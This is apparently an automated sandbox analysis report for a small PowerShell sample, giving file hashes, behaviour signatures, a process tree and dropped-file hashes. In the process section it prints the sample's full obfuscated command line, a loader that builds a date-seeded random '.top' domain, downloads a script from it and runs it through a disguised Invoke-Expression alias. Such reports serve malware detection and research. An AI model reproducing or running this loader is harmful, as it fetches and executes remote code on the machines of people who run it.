Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
22/09/2023, 13:57
Static task
static1
Behavioral task
behavioral1
Sample
9cee1f36.ps1
Resource
win10v2004-20230915-en
General
-
Target
9cee1f36.ps1
-
Size
1KB
-
MD5
e37d2e2f55fdfaf75236633eff0537c2
-
SHA1
e01e214ebb5420ca858a69c5cd79e4aae97831c1
-
SHA256
fff5ba8c935bd9fab2b0e686ba6f9ffca66aa2668d75ff72e558e4abc1e6f583
-
SHA512
b2bbdbb10ec013f72b32c1410d1e8606b8ac3a2ec8ed440d5fef08b3498be7a2d93052ea234c7dfd176e74bac5fa08e716cb57b44f09a91074b65c88b3e49834
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2892 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 804 powershell.exe 804 powershell.exe 2892 powershell.exe 2892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 804 wrote to memory of 2892 804 powershell.exe 84 PID 804 wrote to memory of 2892 804 powershell.exe 84
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9cee1f36.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110) ;$od6v9mnx7aue = New-Object ($([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]82+[char]97+[char]110+[char]100+[char]111+[char]109) )([int]((((Get-Date).DayOfYear+3) / 7) +2024)*2582);for ($mc4hg87a03wn = 0; $mc4hg87a03wn -lt 15; $mc4hg87a03wn++) {$bxjdeg5wn18rpa47qkgm92vyj8 += ($([char]97+[char]98+[char]99+[char]100+[char]101+[char]102+[char]103+[char]104+[char]105+[char]106+[char]107+[char]108+[char]109+[char]110) )[$od6v9mnx7aue.Next(0, 14)];}$9glf8rawu3ds=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47) +$bxjdeg5wn18rpa47qkgm92vyj8+$([char]46+[char]116+[char]111+[char]112+[char]47+[char]49+[char]46+[char]112+[char]104+[char]112+[char]63+[char]115+[char]61+[char]53+[char]49+[char]53) );rzs $9glf8rawu3ds2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD52d74f3420d97c3324b6032942f3a9fa7
SHA195af9f165ffc370c5d654a39d959a8c4231122b9
SHA2568937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d
SHA5123c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82